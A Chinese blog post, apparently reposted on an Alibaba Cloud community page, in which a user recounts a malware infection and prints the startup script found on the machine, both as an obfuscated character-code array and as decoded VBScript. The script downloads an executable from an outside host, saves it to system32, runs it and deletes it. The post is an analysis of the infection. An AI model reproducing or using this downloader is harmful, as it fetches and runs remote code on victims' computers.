首頁 > 業界 > 計算機

電腦中毒了瞭解一點VBS相關知識

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

今天無意中發現自己電腦中毒了,每次開機都會發現自己的Administrator的帳號沒有開機顯示,而且被建立了兩個莫名其妙的管理員帳號,很是鬱悶,通過查看啟動項(MSCONFIG) 發現。多了幾個可疑的啟動項,在啟動項裡多了什麼  C:\WINDOWS\system32\

http1.vbs 通過檔案開啟是這樣一段代碼: (13,83,101,116,32,80,111,115,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,115,120,109,108,50,46,88,77,76,72,84,84,80,34,41,13,10,83,101,116,32,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,80,111,115,116,46,79,112,101,110,32,34,71,69,84,34,44,34,104,116,116,112,58,47,47,108,101,49,57,46,51,51,50,50,46,111,114,103,47,50,46,101,120,101,34,44,48,13,10,80,111,115,116,46,83,101,110,100,40,41,13,10,83,101,116,32,97,71,101,116,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,13,10,97,71,101,116,46,77,111,100,101,32,61,32,51,13,10,97,71,101,116,46,84,121,112,101,32,61,32,49,13,10,97,71,101,116,46,79,112,101,110,40,41,32,13,10,97,71,101,116,46,87,114,105,116,101,40,80,111,115,116,46,114,101,115,112,111,110,115,101,66,111,100,121,41,13,10,97,71,101,116,46,83,97,118,101,84,111,70,105,108,101,32,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,44,50,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,50,48,48,48,48,13,10,83,104,101,108,108,46,82,117,110,32,40,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,41,13,10,119,115,99,114,105,112,116,46,115,108,101,101,112,32,49,48,48,48,48,13,10,115,101,116,32,102,115,111,61,99,114,101,97,116,101,111,98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103,46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99,116,34,41,13,10,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,32,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,-20058,-13891,-15152,-18462,49,52,51,51,46,101,120,101,34,41,13,10)

沒看的懂,先是刪除了啟動項,重啟發現還是不行,開啟註冊表(regedit)尋找該啟動項刪掉註冊表之後開啟HTTP1.VBS發現通過C#程式重新編譯該段代碼打出excute 的內容: runner
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://le19.3322.org/2.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\windows\system32\놦즽쓐럢1433.exe",2
wscript.sleep 20000
Shell.Run ("c:\windows\system32\놦즽쓐럢1433.exe")
wscript.sleep 10000
set fso=createobject("scripting.filesystemobject")
fso.DeleteFile( "c:\windows\system32\놦즽쓐럢1433.exe")

這樣就一目瞭然了的知道了這段VBS到底想幹嗎了。希望把這些全部刪除後能有效,最大的問題是不知道病毒檔案놦즽쓐럢1433.exe 內執行了,什麼東西。希望不會對我的電腦造成太大的影響。

總結:中毒的方法,瀏覽網站+載入執行病毒檔案+下載VBS檔案+加入啟動項+加入註冊表+執行病毒檔案+(造成電腦故障)+刪除病毒檔案。

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

相關關鍵詞:
vbs format vbs exec vbs worksheets aig vbs vbs rename file vbs run command
相關文章
電腦儲存單位Byte、KB、MB、GB、TB、PB、EB、ZB、YB、DB、NB
電腦儲存單位Byte、KB、MB、GB、TB、PB、EB、ZB、YB、DB、NB
電腦不能上網提示:Windows無法與裝置或資源(主DNS伺服器)通訊
2018-2019-1 20189215 《深入理解電腦系統》第一章
自己動手清除電腦中的木馬程式
花3分鐘時間來關閉你電腦上沒用的服務(加快你的電腦運行)

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

熱門內容

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More